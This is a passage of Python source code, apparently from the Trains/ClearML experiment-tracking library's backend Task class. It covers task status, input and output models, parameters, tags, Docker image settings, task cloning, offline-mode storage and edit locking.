""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated, Trains reloads the Task status
information only when this value is accessed.
:return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
@property
def input_model(self):
# type: () -> Optional[Model]
""" A model manager used to handle the input model object """
model_id = self._get_task_property('execution.model', raise_on_error=False)
if not model_id:
return None
if self._input_model is None:
self._input_model = Model(
session=self.session,
model_id=model_id,
cache_dir=self.cache_dir,
log=self.log,
upload_storage_uri=None)
return self._input_model
@property
def output_model(self):
# type: () -> Optional[Model]
""" A model manager used to manage the output model object """
if self._output_model is None:
self._output_model = self._get_output_model(upload_required=True)
return self._output_model
def create_output_model(self):
# type: () -> Model
return self._get_output_model(upload_required=False, force=True)
def _get_output_model(self, upload_required=True, force=False, model_id=None):
# type: (bool, bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or (None if force else self._get_task_property(
'output.model', raise_on_error=False, log_on_error=False)),
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self._reporter is None:
self._setup_reporter()
return self._reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task=self,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self._reporter = Reporter(self._get_metrics_manager(storage_uri=storage_uri))
return self._reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
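# Example (assumed values, for illustration only): a task named "train" with id "abc123"
# in project "MyProject" yields a suffix such as "MyProject/train.abc123/models"
# (components are URL-quoted by the join above).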
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._offline_mode:
# noinspection PyBroadException
try:
with open(self.get_offline_mode_folder() / self._offline_filename, 'rt') as f:
stored_dict = json.load(f)
stored_data = tasks.Task(**stored_dict)
# add missing entries
for k, v in stored_dict.items():
if not hasattr(stored_data, k):
setattr(stored_data, k, v)
if stored_dict.get('project_name'):
self._project_name = (None, stored_dict.get('project_name'))
except Exception:
stored_data = self._data
return stored_data or tasks.Task(
execution=tasks.Execution(
parameters={}, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd=''),
output=tasks.Output())
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
# type: (bool) -> ()
""" Reset the task. Task will be reloaded following a successful reset. """
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.StoppedRequest(self.id, force=force), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None):
# type: (bool, Optional[str], Optional[str]) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message),
ignore_errors=ignore_errors)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) != str(tasks.TaskStatusEnum.stopped):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('model_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(self, model_uri, name=None, comment=None, tags=None):
# type: (str, Optional[str], Optional[str], Optional[Sequence[str]]) -> ()
"""
Update the Task's output model. Use this method to update the output model when you have a local model URI
(for example, storing the weights file locally and specifying a ``file://path/to/file`` URI).
.. important::
This method only updates the model's metadata using the API. It does not upload any data.
:param model_uri: The URI of the updated model weights file.
:type model_uri: str
:param name: The updated model name. (Optional)
:type name: str
:param comment: The updated model description. (Optional)
:type comment: str
:param tags: The updated model tags. (Optional)
:type tags: [str]
"""
self._conditionally_start_task()
self._get_output_model(upload_required=False).update_for_task(model_uri, self.id, name, comment, tags)
def update_output_model_and_upload(
self,
model_file, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
async_enable=False, # type: bool
cb=None, # type: Optional[Callable[[Optional[bool]], bool]]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, Trains uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method),
then Trains updates the model object associated with the Task using an API call. The API call uses the URI
of the uploaded file, and other values provided by additional arguments.
:param str model_file: The path to the updated model weights file.
:param str name: The updated model name. (Optional)
:param str comment: The updated model description. (Optional)
:param list tags: The updated model tags. (Optional)
:param bool async_enable: Request asynchronous upload?
- ``True`` - The API call returns immediately, while the upload and update are scheduled in another thread.
- ``False`` - The API call blocks until the upload completes, and the API call updating the model returns.
(default)
:param callable cb: Asynchronous callback. If ``async_enable`` is set to ``True``,
this is a callback that is invoked once the asynchronous upload and update complete.
:param int iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file. If ``async_enable`` is set to ``True``,
this is the expected URI, as the upload is probably still in progress.
"""
self._conditionally_start_task()
uri = self.output_model.update_for_task_and_upload(
model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb,
iteration=iteration
)
return uri
def _conditionally_start_task(self):
# type: () -> ()
if str(self.status) == str(tasks.TaskStatusEnum.created):
self.started()
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True):
# type: (str, Optional[str], bool, bool) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **Trains Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name. The name is used to locate an existing model in the **Trains Server**
(backend). If ``model_id`` is not specified, then ``model_name`` must be specified.
:param update_task_design: Update the Task's design?
- ``True`` - Trains copies the Task's model design from the input model.
- ``False`` - Trains does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration?
- ``True`` - Trains copies the Task's label enumeration from the input model.
- ``False`` - Trains does not copy the Task's label enumeration from the input model.
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
else:
# clear the input model
model = None
model_id = ''
with self._edit_lock:
self.reload()
# store model id
self.data.execution.model = model_id
# Auto populate input field from model, if they are empty
if update_task_design and not self.data.execution.model_desc:
self.data.execution.model_desc = model.design if model else ''
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
update = kwargs.pop('__update', False)
with self._edit_lock:
self.reload()
if update:
parameters = self.get_parameters()
else:
parameters = dict()
parameters.update(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
parameters.update(kwargs)
not_allowed = {
k: type(v).__name__
for k, v in parameters.items()
if not isinstance(v, self._parameters_allowed_types)
}
if not_allowed:
raise ValueError(
"Only builtin types ({}) are allowed for values (got {})".format(
', '.join(t.__name__ for t in self._parameters_allowed_types),
', '.join('%s=>%s' % p for p in not_allowed.items())),
)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: str(v) if v is not None else "" for k, v in parameters.items()}
execution = self.data.execution
if execution is None:
execution = tasks.Execution(
parameters=parameters, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd='')
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None):
# type: (str, str, Optional[str]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
.. note::
The ``description`` is not yet in use.
"""
# not supported yet
if description:
# noinspection PyUnusedLocal
description = None
self.set_parameters({name: value}, __update=True)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
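# Illustrative usage (values are placeholders): because set_parameters() casts all
# values to strings before storing them, reading a parameter back returns a string:
#   task.set_parameters({'lr': 0.01}, batch_size=32)
#   task.get_parameter('lr', default='0.001')   # -> '0.01'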
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self.set_parameters(__update=True, *args, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists():
return
self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd):
# type: (str) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by trains-agent to execute this experiment
inside the provided docker image.
"""
with self._edit_lock:
self.reload()
execution = self.data.execution
execution.docker_cmd = docker_cmd
self._edit(execution=execution)
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> ()
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
"""
if not Session.check_min_api_version('2.3'):
return False
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts to be a list of tasks.Artifact objects')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration: a dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as a blob of text.
:return: The model configuration as a blob of text.
"""
design = self._get_task_property("execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def set_output_model_id(self, model_id):
# type: (str) -> ()
self.data.output.model = str(model_id)
self._edit(output=self.data.output)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id):
# type: (str) -> ()
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.parent
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
self._set_task_property("comment", str(comment))
self._edit(comment=comment)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
.. code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return the Task status without refreshing the entire Task object (only the status property).
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.trains.allegro.ai/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached, any call will retrieve all the scalar reports from the back-end.
If the Task has many scalars reported, it might take long for the call to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. The default is 0, returning all scalars.
With a sample limit, scalar values are averaged inside the sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(
task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return {}
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most updated) console output
:return: A list of strings, each entry corresponds to one report.
"""
res = self.send(
events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports,)
)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
@classmethod
def get_projects(cls):
# type: () -> (List['projects.Project'])
"""
Return a list of projects in the system, sorted by last updated time
:return: A list of all the projects in the system. Each entry is a `services.projects.Project` object.
"""
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()) for p in res.response.projects]
return []
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``trains-agent`` is not executing it)?
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> ()
"""
Force the adding of a package to the requirements list. If ``package_version`` is not specified, use the
installed package version, if found.
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
cls._force_requirements[package_name] = package_version
def _get_models(self, model_type='output'):
# type: (str) -> Sequence[Model]
# model_type is either 'output' or 'input'
model_type = model_type.lower().strip()
assert model_type == 'output' or model_type == 'input'
if model_type == 'input':
regex = r'((?i)(Using model id: )(\w+)?)'
compiled = re.compile(regex)
ids = [i[-1] for i in re.findall(compiled, self.comment)] + (
[self.input_model_id] if self.input_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
in_model = []
for i in ids:
m = TrainsModel(model_id=i)
# noinspection PyBroadException
try:
# make sure the model is valid
# noinspection PyProtectedMember
m._get_model_data()
in_model.append(m)
except Exception:
pass
return in_model
else:
res = self.send(
models.GetAllRequest(
task=[self.id],
order_by=['created'],
only_fields=['id']
)
)
if not res.response.models:
return []
ids = [m.id for m in res.response.models] + ([self.output_model_id] if self.output_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
return [TrainsModel(model_id=i) for i in ids]
def _get_default_report_storage_uri(self):
# type: () -> str
if self._offline_mode:
return str(self.get_offline_mode_folder() / 'data')
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
if self._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> str
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
if self._offline_mode:
for k, v in kwargs.items():
setattr(self.data, k, v)
Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True)
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f:
export_data = self.data.to_dict()
export_data['project_name'] = self.get_project_name()
export_data['offline_folder'] = self.get_offline_mode_folder().as_posix()
json.dump(export_data, f, ensure_ascii=True, sort_keys=True)
return None
# Since we are using a forced update, make sure the task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# protection, Old API might not support it
# noinspection PyBroadException
try:
with self._edit_lock:
self.reload()
self.data.script.requirements = requirements
if self._offline_mode:
self._edit(script=self.data.script)
else:
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
with self._edit_lock:
self.reload()
self.data.script = script
self._edit(script=script)
def get_offline_mode_folder(self):
# type: () -> (Optional[Path])
"""
Return the folder where all the task outputs and logs are stored in the offline session.
:return: Path object, local folder, later to be used with `report_offline_session()`
"""
if not self._offline_mode:
return None
return get_offline_dir(task_id=self.task_id)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: Name for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional updated model tags
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new task's ID.
"""
session = session if session else cls._get_default_session()
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: py
status='completed', search_text='specific_word', user='user_id', project='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
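# Illustrative usage sketch (not part of the original class): the kwargs are passed
# straight into tasks.GetAllRequest, so a filtered listing could look like the call
# below. The filter values and the project ID are assumed placeholders.
#
#   res = Task.get_all(status=['completed'], project=['<project-id>'])
#   task_ids = [t.id for t in res.response.tasks]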
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
@classmethod
def _get_project_name(cls, project_id):
res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
return res.response.project.name
def _get_all_events(self, max_events=100):
# type: (int) -> Any
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:return: A list of events from the task.
"""
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
))
events_list = log_events.response.events
total_events = log_events.response.total
scroll = log_events.response.scroll_id
while len(events_list) < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
scroll_id=scroll,
))
events_list.extend(log_events.response.events)
scroll = log_events.response.scroll_id
return events_list
@property
def _edit_lock(self):
# type: () -> ()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
filename = os.path.join(gettempdir(), 'trains_{}.lock'.format(self.id))
# no need to remove previous file lock if we have a dead process, it will automatically release the lock.
# # noinspection PyBroadException
# try:
# os.unlink(filename)
# except Exception:
# pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Union[str, Task]) -> ()
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
